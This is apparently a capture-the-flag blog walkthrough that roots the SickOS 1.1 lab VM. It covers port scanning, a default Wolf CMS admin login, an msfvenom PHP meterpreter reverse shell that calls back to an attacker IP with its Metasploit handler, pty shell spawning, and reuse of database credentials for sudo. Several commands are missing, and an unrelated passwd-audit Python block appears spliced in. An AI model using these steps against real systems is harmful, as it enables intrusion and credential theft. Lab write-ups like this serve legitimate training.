This time we are going to crack SickOS 1.1 from the Boot2root challenges. This CTF gives a clear analogy of how hacking strategies can be carried out against a network to compromise it, in a safe environment. The objective is to compromise the network/machine and gain administrative/root privileges on it.
We will start off by finding the target.
Our target IP is 192.168.0.101. Now we scan it with Nmap, covering all ports with service and version detection:
nmap -p- -A 192.168.0.101
The ports we found open are 22, 3128 and 8080. If you try to open the VM's IP directly in the browser, nothing will load and you will find nothing. So, we now run nikto against the proxy port instead:
nikto -h 192.168.0.101:3128
Nikto finds a text file called robots.txt. Let's try to open it in the browser.
This tells us something about /wolfcms, which means the website is built on Wolf CMS and/or there is a directory named /wolfcms. We tried opening it in the browser, but that failed. If you look back at the nmap output, there was something about a proxy on port 3128. So we will set up a manual proxy in the browser: give the IP of the VM as the HTTP proxy and 3128 as the port.
After the proxy has been set up, open the site at the link: 192.168.0.101/wolfcms/
The page will open as above, confirming that it has been made in Wolf CMS. I don't know much about Wolf CMS, so I searched Google to find out where the admin page resides.
Once I found the login page through Google, I opened it. It asked me for a username and password. By default, the username and password are admin and admin respectively.
I used the default username and password and logged in to the page shown below. Here, select the Files tab and then the Upload files option.
Here we need to upload the malicious file. To generate it, open your terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.103 lport=4444 -f raw
Copy the code from <?php to die(); and paste it into a text file with the extension .php. Upload that file.
Now, before running the file, start multi/handler in Metasploit by typing:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
run
Once you hit enter, run the uploaded file too, and you will get your session. Once you have it, go to the shell and type:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
After doing the above, you will have an interactive shell as a user on our target. To see what files and directories are there, type:
Then read config.php by typing:
Reading the config.php file will give you all the details about the database, including the username and password, i.e. root and john@123 respectively.
Moving further, read the password file. To do so, type:
Observe all the user details it gives us; you will find that user sickos has the value 1000:1000 (UID:GID), which means this is the first regular user created on the system. So we might find our way in here, as it is the first user. Therefore, switch user to sickos with the password john@123 that we found.
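The check on the 1000:1000 entry is something a defender can automate when reviewing a box: the following added example (not part of the original post) parses passwd-format text, lists the accounts with an interactive shell, picks the first regular user, and also flags any extra UID-0 account, which goes a step beyond what the post reads off by hand. The sample lines are constructed for the example, not the target's real file.

```python
# Constructed sample in /etc/passwd format; not the target machine's real file.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
backup-op:x:1001:1001::/home/backup-op:/bin/sh
toor:x:0:0:second superuser:/root:/bin/bash
"""

# Shells that give a login session (as opposed to nologin/false).
INTERACTIVE_SHELLS = {"/bin/bash", "/bin/sh", "/bin/zsh", "/bin/dash"}


def parse_passwd(text):
    """Parse passwd-format text into one dict per account (7 colon-separated fields)."""
    accounts = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd line: {line!r}")
        name, _pw, uid, gid, _gecos, home, shell = fields
        accounts.append({"name": name, "uid": int(uid), "gid": int(gid),
                         "home": home, "shell": shell})
    return accounts


def audit_passwd(text, first_regular_uid=1000):
    """Return the first human account, all interactive accounts, and audit findings.

    On Debian/Ubuntu the first user created at install time gets UID 1000, so the
    lowest UID >= 1000 with a real shell is the account the post calls the first user.
    """
    accounts = parse_passwd(text)
    regular = sorted((a for a in accounts
                      if a["uid"] >= first_regular_uid and a["shell"] in INTERACTIVE_SHELLS),
                     key=lambda a: a["uid"])
    findings = []
    for a in accounts:
        # Any UID-0 account other than root is a second superuser and should be flagged.
        if a["uid"] == 0 and a["name"] != "root":
            findings.append(f"extra uid 0 account: {a['name']}")
    return {"first_user": regular[0]["name"] if regular else None,
            "interactive_users": [a["name"] for a in regular],
            "findings": findings}
```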
Then type the following command to see the user's IDs:
Now we need root access, and for that type:
Give the password john@123 again. To confirm that you are now root, type:
Furthermore, we need to go into /root to look for the flag, so run the following set of commands:
Here you will find a text file. Let's read it.
Author: Yashika Dhir is a passionate researcher and technical writer at Hacking Articles. She is a hacking enthusiast.